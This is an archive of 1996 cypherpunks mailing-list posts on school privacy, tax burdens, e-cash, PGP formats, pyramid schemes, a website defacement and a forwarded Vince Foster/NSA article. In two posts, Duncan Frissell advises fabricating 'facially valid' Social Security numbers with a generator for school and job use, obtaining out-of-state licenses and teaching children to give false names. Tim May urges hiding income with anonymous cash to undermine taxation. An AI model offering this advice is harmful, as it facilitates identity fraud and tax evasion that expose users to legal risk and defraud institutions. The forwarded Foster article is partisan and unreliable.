Message-ID: <Pine.SUN.3.91.961112111038.16617B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 12 Nov 1996, Juriaan Massenza wrote:

> I love bots...

I wish people would smarten up the bots and not spam more than one reply 
to each address.  Sheesh!

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 11:23:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Child Protective Services and Political Views
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <v03007800aeae79b8d736@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 AM -0800 11/12/96, Vince Callaway wrote:
>>
>> Are there other measures which parents could take while their children are
>> young to get them off to a good start, privacy-wise?
>
>Every couple of months I one of my kids brings home a form from school
>asking everything from how many kids in the family, how much money do I
>make, do we own our home and other things that have nothing to do with
>educating my children.
>
>At first I just pitched them, but then they started getting on my kids for
>not returning them.  When they did that I went to the school and demanded
>to see a background history and credit report on every school employee who
>came in contact with my child.  They refused sighting privacy etc...  I
>told them I had the same rights and to stop hasseling me with their little
>forms.

Interesting comments. I don't have children, let alone children in school,
but I sure as hell would not answer such questions. I count myself lucky
that when I was in the public school system there were no such questions,
at least I never heard of any.

I wonder to what extent children are asked questions about their home life,
or about the things their parents do, without the parents even being in the
loop? If not now, soon. For example, children may be asked to fill out
questionaires on whether they've been spanked, whether alcohol and smoking
is present, whether guns are in the house, and so on.

(This is part of the generally totalitarian mindset which is pervasive in
the public school system. Last year I paid over $8000 in *property* taxes,
ostensibly largely for public schools (and of course I paid a whole lot
more in various other taxes). I have no children, as I said. And yet the
public schools wanted a cut of gambling revenues, which they got (kind of
gives a "does not compute" when the schools moralize about the dangers of
gambling, expel kids for being in card or dice games, and so on, all the
while being the main beneficiary of what Heinlein called a tax on
stupidity). Further, the schools brainwash the kids into cajoling their
parents to donate time, computers, labor for fixups, and even cash.)

Sadly, it is quite possible that by sufficiently obstreprous about such
things, the school counsellors could initiate investigations by Child
Protective Services, on vague grounds that the "home environment" is not
sufficiently nurturing (= politically correct). Here in the People's
Republic of California, they have nearly unchallenged authority to remove
children from homes on their own say so, with the parental-units then
forced to hire lawyers and mount a court challenge.

(Needless to say, meeting the CPS Gestapo agents with the display of a
gun--which would be the normal reaction Americans should have to kidnappers
of their children--would result in one's immediate arrest and the immediate
seizure of the children.)

Opinions may be changing. I get a lot of double takes and then smiles and
laughter when I wear my "D.A.R.E." t-shirt. "D.A.R.E. stands for "Drug
Abuse Resistance Education," and is a nationwide program run jointly by the
police departments and schools, in which children are taught the "reefer
madness" dangers of drugs, alchohol, etc., and are given instructions on
who to call if they suspect their parents are illegally using drugs. This
"junior narc" program has resulted in the breakup of many families, as
parents were hauled away to jail and kids were put in foster homes because
the little Pavel Morozovs narced out their parents.

So, why do I get double takes and smiles? Because my shirt, bought from
someone advertising it in alt.drugs, says:

"D.A.R.E." [in large red letters]

"I turned in my parents
and all I got was this
lousy t-shirt."

(Interestingly, I wore this t-shirt to a pool party last summer. A couple
I've known for many years has a 14-year-old son. The mother sternly
lectured me on the poor message I was sending to her son, and said I was
not to talk to the kid about my views on drug legalization, etc. I bit my
tongue, avoiding saying "Fuck off," but could not restrain myself from
saying, "I'll talk to whoever I want. It's up to you to control who your
son talks to." Rude? Perhaps. But the mindset of brainwashed zombies is
what creates this police state mentality. Who knows, it may even be a
technical crime ("contributing to the delinquency of a minor"?) to even
discuss basic libertarian ideas with a minor. And as I said, Child
Protective Services could quite possibly seize a child whose parents were
sufficiently vocal about their beliefs.)


Perhaps someday we'll see the "C.A.R.E." program--Crypto Abuse Resistance
Education.

"Now children, if you see someone you think is using illegal computer
programs, or someone who is talking in a way that we have told you to watch
out for, here are some phone numbers you can call. Your daddy and mommy may
just need to be re-educated, just like we are re-educating you here in this
People's Public School."

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 11:40:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <199611101939.LAA13170@netcom4.netcom.com>
Message-ID: <v03007801aeae80c47f21@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 AM -0500 11/12/96, Ted Anderson wrote:

>This concluding paragraph got me to thinking of something I read
>recently in "Bionomics" [1] about the public education problem.  The
>point being made there is that injecting even a little real competition
>into a monopoly situation improves things tremendously.  It is the
>counter argument to the objection that allowing students choice of
>schools will destroy the majority, as the "good" kids flee.  What will
>happen instead is that most schools, seeing imminient flight, will take
>measures to avoid losing students (and taking their tuition with them).
>A few, that really can't adapt in time, fail and their students are
>forced to seek other schools.  The result is that all schools, even
>"public" schools improve dramatically.


Many years ago, circa 1989 or so, I wrote a satirical essay which I called
"Access to Food Must be Equal!" I can't seem to find it right now, so I may
have moved it off my hard disks in one of my periodic housecleanings...I'll
try to dig it up.

The gist was that of an alternate reality in which supermarkets were not
private, but were run the way the public schools were run. That is, each
neighborhood was in some Food Distribution District, at which a household
bought its food or even got it for free (I didn't flesh this point out, but
the parallel with public schools is that the landowners would pay property
taxes, but everyone would be able to get food for free, according to some
ration or coupon system).

(And if you think about it, food is pretty important, and supermarkets are
roughly distributed the same way and in the same numbers as elementary
schools, junior high schools, high schools, etc. So it's not completely
far-fetched to imagine America having taken a different turn a century ago,
and including food distribution centers in the same system.)

I even included mention of the important role the PGA (Parent-Grocer
Association) played in ensuring the nutritive requirements of young bodies
are met. And the need for "nutritional standards" to keep junk food off the
shelves, and only bran muffins and similar digestives be in every meal.

My piece was written as a rant about the dangers of the proposed talk of
"privatizing food distribution points," about how this would result in a
system where only the rich could get access to nutritional food, and how
the poor would be made to suffer. And how this "caloric anarchy" would
result in vicious monopolies, price wars, and deviation from Recommended
Governmental Caloric Intake Rules.


Think about this kind of parallel when privatization of schools is talked
about.

P.S. The "bionomics" stuff is just reworked ideas from a bunch of other
fields, given new names, and packaged with seminars, training classes, and
other multi-level marketing nonsense. I'm not impressed.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vznuri@netcom.com (Vladimir Z. Nuri)
Date: Tue, 12 Nov 1996 12:25:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: (fwd) NSA And Vince Foster?
Message-ID: <199611122025.MAA24148@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



gadzooks, has anyone seen this yet? atom bomb type stuff here.
I guess we won't hear Perry and others rant about Vince Foster
material on the list any more, eh? 


From: softwar@us.net (Charles R. Smith)
Newsgroups: talk.politics.crypto
Subject: NSA And Vince Foster?
Date: Mon, 11 Nov 1996 00:36:45 GMT

========
ubject: NSA FOSTER DOCS:  FOSTER INVOLVED IN NSA COMPUTER ESPIONAGE
ISSUES
From: "John Q. Public" <jqp@globaldialog.com>
Date: Sun, 10 Nov 1996 13:13:29 -0600

not to be used for commercial purposes
from the Nov. 11, 1996 issue of The Washington Weekly
posted with permission


	NSA RELEASES DECLASSIFIED FOSTER DOCUMENTS


     The National Security Agency  has  now  released  the  first
batch  of  documents  in  response  to  a  Washington Weekly FOIA
request filed in August of 1995. The documents, pertaining to the
late  Vincent  W.  Foster  and  his  work  with  the NSA and with
Systematics Inc. have many passages and  names  blacked  out  and
some  documents  bear "Confidential" or "Secret" classifications.
The  first  batch  of   documents   contain   77   pages.   After
conversations  with  NSA  staff, we understand that an additional
estimated  600 to 700 pages of documents will be released pending
review  by  other  intelligence  agencies.  The Washington Weekly
eventually will make all documents available on its web site.

VINCE FOSTER INVOLVED IN NSA COMPUTER ESPIONAGE ISSUES

    One morning in May of 1993, a  mini  bus  left  the  National
Security  Agency  at  Ft.  George  G.  Meade,  Maryland. It drove
directly to the White House  to  pick  up  Bernard  Nussbaum  and
Vincent W. Foster. From there, the party proceeded to the Justice
Department to pick up Webster Hubbell and John  Rogovin.  At  the
Supreme  Court,  Justice John Paul Stevens joined the party. They
all returned to the NSA for a secret roundtable  discussion  with
top NSA officials on Codebreaking and Telecommunications.  On the
agenda were items such as:

 * What Has Happened to SIGINT
 * How We Handle Crypt[ology] Problems
 * Problems We Face In The Future
 * Rule of Law

    Only this broad outline of  the  meeting  is  revealed  in  a
recently  declassified  NSA document. But it makes clear that one
of  Vince  Foster's  responsibilities  at  the  White  House  was
cryptology  and  intelligence gathering. As such, he was privy to
top secrets.  That would explain the presence of two NSA  binders
deposited  by  Vince Foster in a White House safe. So why did the
White House deny that Foster was working on NSA  documents?  Last
May, White House spokesman Mark Fabiani told the Washington Times
that "There were no National Security Agency  documents  that  he
was working on that were in his possession."

    Why did the White House try to conceal Foster's NSA ties? Why
did  Fabiani  find it necessary to contradict the sworn statement
of Foster's secretary Deborah Gorham, who said that  "There  were
two  one-inch  ring  binders that were from the National Security
Agency"?





  Published in the Nov. 11, 1996 Issue of The Washington Weekly
Copyright (c) 1996 The Washington Weekly (http://www.federal.com)



--
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 12 Nov 1996 11:15:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Make.digital.money.fast
Message-ID: <woJaXD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> On Sun, 10 Nov 1996, Clay Olbon II wrote:
> 
> > Pyramid schemes could be a growth market in a crypto-anarchic world.  It is
> > yet another market such as gambling, or the lottery, that could be conducte
> > with anonymity.  And it appears to be much more widespread on the internet
> 
> How is it like gambling? If I get a pyramid letter instructing me to send 
> money to five people on the list, add my name to the bottom, send to 5 
> people, or whatever, there's nothing stopping me from removing all the 
> names, adding my name and those of four friends, and passing the letter 
> along. With an anonymous system, I could easily be all five people, 
> without even the bother of getting five different post office boxes.
> 
> There's no gambling involved; only blantant stupidity.

I agree - MMF is stupid. Gambling in Las Vegas is stupid. Buying lottery
tickets is stupid (except in rare cases when the jackpot is very large.)
The way most investors play the market is stupid. It's unbelieavble how
many billions of dollars move around in non-productive activities which
can only be described as stupid.

Coming back to MMF, I recall the famous quote from Dave Rhoad's original
post which said approximately: "The success of this project depends on the
honest and integrity of each participant." (By the way, DR is a real person,
living in California.) My small-scale survey indicates that almost all the
people who post MMF try to "cheat" in a minor way by not sending the $5 to
the 5 people upstream of them. I think this casn be prevented cryptograhicaly
if the MMF post includes digitally signed assertions from the 5 upstream
people certifying that they've received their $ from this particular poster.
A slightly more sophisticated form of "cheating" is described by RW above:
the poster generated 5 nyms, generated 5 receipts from these nyms, and
effectively starts a new pyramid. A partial response to that would be
to require each new nym to be certified by its immediate upstream
neighbor: sort of like the web of trust, rooted in Dave Rhoades himself.
But that too can be circumvented by a single person "spamming" the
pyramid by multiple nyms all belonging to him. There's no good way
to ascertain that mutliple nyms don't belong to the same person.
> 

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Edwards <sedwards@cts.com>
Date: Tue, 12 Nov 1996 12:15:18 -0800 (PST)
To: Eraser <security@myinternet.net>
Subject: Re: Kriegsman Furs Website hacked...
In-Reply-To: <288896e0@myinternet.net>
Message-ID: <Pine.SCO.3.91.961112131159.5106B-100000@crash.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


These hacks can be amusing, regardless of your political orientation...

But, to bring the thread onto topic, how are these hacks perpetrated and 
how can a responsible webmaster reduce the exposure?

On Wed, 13 Nov 1996, Eraser wrote:

> 
> Hey all..
> 
> Another commercial hack.
> 
> http://www.kriegsman.com/ which is still live at this posting.

not any more.

> if it goes down, or is fixed, a mirror exists on
> http://www.skeeve.net/kriegsman/
> 
> nicely done...
> 
> one for the furry creatures.
> 
>  -------------------------------------------------------------------
> | Skeeve Stevens - MyInternet  personal.url: http://www.skeeve.net/ |
> | email://skeeve@skeeve.net/   work.url: http://www.myinternet.net/ |
> | phone://612.9869.3334/       mobile://0414.SKEEVE/      [753-383] |
>  -------------------------------------------------------------------
> 

Steve Edwards
sedwards@cts.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Nov 1996 11:02:05 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Children and Privacy
Message-ID: <3.0b36.32.19961112110803.0075a02c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 11/12/96 -0800, Timothy C. May wrote:
>(Side note: Jim McCoy's suggestion that kids can be kept off the
>parental-unit's tax returns and thus not get a SS number is fraught with
>problems. Many schools--including public schools--use the SS number for
>various internal and tracking reasons. 

Anyone who turns their children over to puiblic schools cannot be very
interested in privacy since public schools are the major pathway that
governments use to exert social controls on families.  In addition to all
the paperwork on and tracking of the children, public schools record and
track the families.  The various state child protective services agencies
use information derived from schools to control children and parents.  If
you are not on welfare and do not have your children in a government
school, you will almost never come to the attention of those authorities.

>Even if the kid is free of SS
>numbers until he's a teenager--at a cost of thousands of dollars a year in
>IRS deductions not taken--he'll essentially have to have an SS number in

The "fine" for not listing your kids SS# on returns is minor ($50) and is
not usually assesed in any case.  You can still deduct them.  Also those
millions of parents who don't file their returns don't face the problem
either.

>his high school years, for a variety of reasons. Maybe this can be avoided,
>but I doubt the reward is worth the hassles.)

It is very rare to have an SS# bounced back at you if you just make one up
which is valid on its face.  This applies to both schools and jobs.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Nov 1996 10:58:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Children & Privacy
Message-ID: <3.0b36.32.19961112135631.00754284@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM -0800 11/11/96, Hal Finney wrote:
>
>>I have two kids entering their teens, and I'm sure other list members are
>>parents as well.  What can we do for our children to help them enter their
>>adult lives with better chances to retain privacy?  

Perfect privacy is very difficult to achieve but with practice, one can
learn (and teach one's children) much improved privacy.  The following
suggestions are not the most radical ones.  They represent things that you
can do at little cost or risk. 

Things you can do to teach your children to protect their privacy.

1)	Practice privacy yourself.  Children learn by example.
2)	Don't apply for an SS# for your child.
3)     Do apply for a passport for your child (without an SS# of course).
Use it as the foundation for an ID pack for your child because passport
apps don't contain much useful information on a person and can even be
obtained without a birth certificate when the child is an infant.
4)	Make up some facially valid SS numbers for future use using a freeware
program like ssn.exe.
5)	Teach your child to give your accommodation address and voice mail
number as his address and phone number whenever asked (just like you do --
you do do that, don't you).
6)	In descending order of importance: keep him out of government schools,
keep him out of private schools in your country of residence, home school
him.  (Government schools give the government a direct opening into
information about your family.  Handing a child over to the government
effectively ends any parental rights you might have while he is in school.
Additionally, he may never learn to read and write.)
7)	Introduce privacy concerns into your ideolect: Whenever you are driving
around and see a police car say "There's the Geheime Staatspolizei" and
explain who the "Home State Police" were.  
8)	Play privacy games like:  Let's think of things we can say to people who
ask us why we're not in school."  "Let's think up some neat names to give
to people when we don't want them to give them our real name."  "Let's
practice giving random answers to the question 'What's your name, address,
and phone number.'"
9)	When driver's license time comes teach them how to get a license in
another state or country than their state of residence (and why this is
important).
10)	Get them a secured credit card in their true name to add to their ID
pack.  If you like, you can get them one in a nom de guerre as well.
Secured credit cards are the best ID money can buy. (Because people think
they're ID but they're not).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 12 Nov 1996 11:12:21 -0800 (PST)
To: Open Net Postmaster <root@ns1.openweb.net.au
Subject: Re: Returned mail: User Unknown
In-Reply-To: <199611120944.UAA13541@rainy-day.openweb.net.au>
Message-ID: <Pine.SCO.3.93.961112134913.11606B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Open Net Postmaster wrote:

Your bot is mailing these bounce messages to a mailing list.  Over 1000
people have gotten the (numerous) copies your server has been sending
about this discontinued address.  The message it received had a "reply to"
header in it, but apparently it's been programmed to mail its message to
every address it can find in the message header. 

We have no way of knowing specifically which address is bad unless you
tell us.  While we do have a list of subscribers, it may not be
reasonable to assume that everyone using your domain name wants to be
dropped from the list.  We have, in other words, no reasonable way through
which we can respond to your bot's request that we "remove" the address
from our mailing list.

Please ask your bot to direct its replies to "cypherpunks-errors@toad.com" 
(not the entire mailing list, which receives all mail sent to the
"cypherpunks" address), and to INCLUDE the now-defunct e-mail address
(that's probably a change that others receiving your message would
appreciate as well). 

Thanks for your help with this little problem.

> 
> The address you mailed to is no longer valid.
> This is probably because the user in question was an
> old Open Net subscriber. Open Net is NO LONGER an ISP,
> and has not been since May 1996.
> 
> We have no redirection address for that user. Please
> remove them from any mailing lists you might have.
> 
> This response was generated automatically.

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Tue, 12 Nov 1996 11:06:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961112.130433.9303.1.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



 
Financial Times: Friday, November 8, 1996
 
Credit Card Group Set for Control of Mondex 
 
By Tim Burt 
 
MasterCard International, the credit card consortium, has stepped up its
bid
to take a leading position in the embryonic cash card business by
agreeing to
acquire a majority stake in Mondex International of the UK. 
 
Mondex is a leading developer of "electronic purses" -- plastic cards
with
memory chips that can be "loaded" with cash and used for small purchases.

 
The deal is expected to give MasterCard 51 per cent of Mondex, set up by

National Westminster and Midland of the UK but now jointly owned by 17
banks. 
 
Under the agreement, MasterCard would promote the Mondex electronic
cash card through banks which carry its franchise. 
 
The Mondex system has been piloted in Swindon, Wiltshire, and Hong
Kong. 
 
It works by storing cash on a microchip card, which can be loaded using
automatic telling machines or specially equipped telephones. 
 
Cards -- including credit, debit and store cards -- are used for payments
worth an estimated #2,000bn a year. 
 
MasterCard believes Mondex could give it a greater share of that market,
although some industry observers doubt the appetite for such electronic
cash
cards. 
 
The acquisition could exacerbate tensions between MasterCard and Visa,
its
main rival, in attempts to establish an industry-wide standard for chip
cards.
Visa has already done pilot tests of its electronic purse at the Atlanta
Olympic Games last summer and in Spain, Australia and Argentina.
 
It is understood Mondex would become a free-standing subsidiary of
MasterCard, and its existing management is expected to remain. 
 
Banking analysts said the deal could signal an admission by MasterCard
that
trials of its own electronic purse had not proved an unqualified success.

 
Yesterday, however, MasterCard said it would be conducting a full-scale
trial of its own smart card in New York next March. 
 
Electronic purses are undergoing trials elsewhere in Europe and North
America, and some of Mondex's rivals claim it does not conform to the
international standards for chip cards developed by companies such as
Visa
and Europay. 
 
Mondex has had a mixed reception among UK customers and retailers but
said this week that it had been received enthusiastically in the Far
East.
 
In Hong Kong -- where Mondex was launched last month in conjunction
with HongkongBank and Hang Seng Bank -- more than 20,000 customers
and 400 stores have signed up to join the scheme at the two malls where
it is
being tested. 
 
The card is also being tested in Canada and is expected to be launched in
Australia next year. 
 
 
 
Financial Times: Friday, November 8, 1996
 
World Tries Out New Electronic Purse Systems
 
By George Graham
 
Ever since inventors figured out how to implant a miniature computer chip
in
the thickness of a standard payment card, banks have been toying with the
possibilities opened up by this extra memory and processing power. 
 
Top of most lists is the electronic purse: a way of loading money on to
the
card so that it can be used as a direct substitute for cash in small 
transactions such as buying a newspaper or a bus ticket. 
 
Mondex is among a host of electronic purses now on trial around the
world.
Originally piloted in Swindon, England, it is also being tested in Canada
and
was launched this week in Hong Kong. 
 
The arrival of MasterCard, the international payment card consortium, as
its
prospective majority shareholder will give Mondex the opportunity to move
beyond local and national trials to, potentially, worldwide use. 
 
MasterCard had run trials of its own electronic purse in Canberra, though
reports that these proved unsatisfactory would appear to be borne out by
its
imminent new link with Mondex. But Mondex is not alone in the electronic
purse contest.
 
Visa, MasterCard's great rival, piloted its Visa Cash electronic purse at
the
Atlanta Olympics, and in such countries as Spain, Australia, and
Argentina. It
will be launching a trial in the UK next year. Europay, despite being
MasterCard's partner in Europe, has already launched its own purse called
the Clip. 
 
Other national electronic purses range from the disposable Danmont card
in

Denmark -- sold for face value and thrown away when used up, like a phone
card -- to the reloadable Quick chip in Austria, which is integrated into
the
customer's regular cash card. 
 
The most heavily used electronic purse so far, and arguably the only one
that
can yet claim to be a commercial success beyond a closed circuit such as
a
university, is the PMB card in Portugal. It has 170,000 cards in active
use,
and an expected 50,000 point of sale terminals installed by the end of
this
year. 
 
But no winner has yet emerged. 
 
"The reason for all of these pilots is that no one has proven the
business case.
I'll be really interested to see if anyone makes money out of this," Mr
Eugene
Lockhart, president of MasterCard International, said earlier this year. 
 
Banks generally like the idea of an electronic purse, which cuts out the
risk
they run on a credit card payment of not getting paid. It is also cheaper
to
operate than a debit card: because the money is already loaded on the
card,
there is no need for each transaction to be authorised by a central
computer. 
 
'The reason for all these pilots is that no one has proven the business
case'
weighs particularly with late night shops and with bus and taxi drivers
who do
not want to have to carry change around with them. 
 
But they do not want to install new card terminals until they are sure
what the
standard will be. 
 
The gains are much less obvious for consumers. To compete with cash, an
electronic purse has to be not only free but very widely accepted. That
threshold has so far been crossed usually in very limited geographical
areas,
such as the Sydney suburb where an electronic purse accepted at petrol
stations, shops and fast food outlets has been successfully married with
a bus
pass. 
 
Mondex's technological features make it a closer replica of cash than
most
competitors. Mondex money moves anonymously from one person to the
next, and can even be transferred to another individual's Mondex card,
instead of only to a shop with a special terminal. 
 
In most other systems each transaction ends up being processed through a
central computer. That leaves more of an audit trail -- a plus point with
police. 
 
But Mondex's biggest shortcoming has been that it stood alone, raising
questions on whether it would gain acceptance beyond the confines of
Swindon. Rivals say it does not conform technically to the international
standards for chip cards developed by Visa, MasterCard and Europay,
although Mondex officials have demonstrated its cards will work in
standard
terminals. 
 
Mondex took a big step towards wider acceptance this summer, when
National Westminster Bank, its creator, sold control to a broad
international
consortium of banks. With MasterCard expected to take control, the
Mondex card has will be crossing another threshold toward worldwide
acceptance. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 12 Nov 1996 13:43:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <847822514.528714.0@fatmans.demon.co.uk>
Message-ID: <7gPaXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:

> 
> > Yeah, right. Be sure to ask Paul Bradley to implement his brute force
> > attack on one-time pads. :-)
> 
> I retracted this and as I explained the post was in error as I was 
> talking about stream ciphers when I should have been taking about 
> OTPs. Please read a little deeper into my post asshole.

I've got more interesting things to do than read "deeper" into
your ignorant drivel.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 12 Nov 1996 05:48:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: pgp3
Message-ID: <199611121348.OAA12869@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> Someone suggested to me that Derek posted a draft spec for PGP 3.0.
> Anyone know of the whereabouts of this document.

Yes.  That document has evolved to RFC 1991:

1991  I   D. Atkins, W. Stallings, P. Zimmermann, "PGP Message Exchange  
           Formats", 08/16/1996. (Pages=21) (Format=.txt) 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 12 Nov 1996 15:02:09 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: pgp3
In-Reply-To: <199611121348.OAA12869@internal-mail.systemics.com>
Message-ID: <328901CF.6BABEF80@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland wrote:
> 
> > Someone suggested to me that Derek posted a draft spec for PGP 3.0.
> > Anyone know of the whereabouts of this document.
> 
> Yes.  That document has evolved to RFC 1991:
> 
> 1991  I   D. Atkins, W. Stallings, P. Zimmermann, "PGP Message Exchange
>            Formats", 08/16/1996. (Pages=21) (Format=.txt)

Nope. This RFC is merely a rehash of the pgformat.doc file in the PGP
2.6.? distribution. I'm doing an independent implementation of the PGP
2.6 message formats, and found this document unclear in a few spots. For
example, can anyone else figure out the weird CFB variant mode from this
document? I used a debugger on the PGP code to help me figure it out.

The PGP 3.0 "spec" that you're referring to is actually a draft for a
PGP library API. A couple of those got circulated on some PGP mailing
lists, but none have been publicly released, another example of the
secrecy surrounding the whole PGP effort.

Now that PGP Inc. is happening, it's not exactly clear whether the PGP
3.0 release is going to include an API closely resembling these drafts.

Hope this helps.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 15:17:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <3.0.32.19961112152531.00a068b0@rpcp.mit.edu>
Message-ID: <v03007800aeaeb3e87bba@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:25 PM -0500 11/12/96, Joseph M. Reagle Jr. wrote:
>Another thought experiment, comments welcomed:
>
>o TAXES THOUGHT EXPERIMENT
>
> 1) I generate $100 of productivity for my company
> 2) Company is taxed %30, $70 left
> 3) Company pay shareholders and costs, $30 is left
> 4) Company pays me
> 5) I pay 40% in taxes, so $18 left
> 6) With $18 I can buy a $16.82 object (%07 sales tax).
>
>Results:
> 1) I see $16.82 realization from $100 productivity increase.
> * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.

Indeed, this is one of several ways of looking at the sickness that faces
us with taxes.

Here's a variant of direct interest to me:

1. Some friends of mine have a good idea for a product and wish to form a
venture to develop it.

2. I sell $200,000 of some asset I own.

3. Tax collectors take 40% of this, leaving me with $120,000 to invest in
the startup venture.

4. There's a high probablility the investment will fail ("venture"
capital). If it fails, and my money has been tied up for several years, I
have not only paid a lot of taxes, but also have lost a normal return. And
my losses, at liquidation, are deductible only against other capital gains.
If I happened to have no other capital gains, I am largely screwed (there
are a few provisions for tax-loss carryforwards, blah blah, but basically
the tax laws are set up to make sure all gains are taxed and make sure
losses are as hard to deduct as possible).

5. In the event that my friends basically succeed, here's the tax situation:

- They owe corporate income taxes of between 35 and 50%, depending.

- Their salaries have been taxed, at rates of 30-45%, typically.

- Any net appreciation in stock value is taxed upon sale at 40%, roughly.

6. It doesn't take a racket scientist to see that investing in a new
business is  increasingly a losing proposition. Add up all the taxes,
factor in the risks, and the answer is clear: why bother?

The crypto-relevance is via crypto anarchy: we need to undermine the tax
system enough that _everyone_, not just us, loses faith in it. (There could
be a "straw that broke the camel's back" effect, if people lose confidence
in the system. Even if most people are _not_ using anonymous digital cash
to hide income, if _enough_ are (and this "enough" could be a visible
minority, visible through recounts of their deeds), then confidence could
be lost. As in Italy and other such places, where compliance rates on taxes
are very low.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
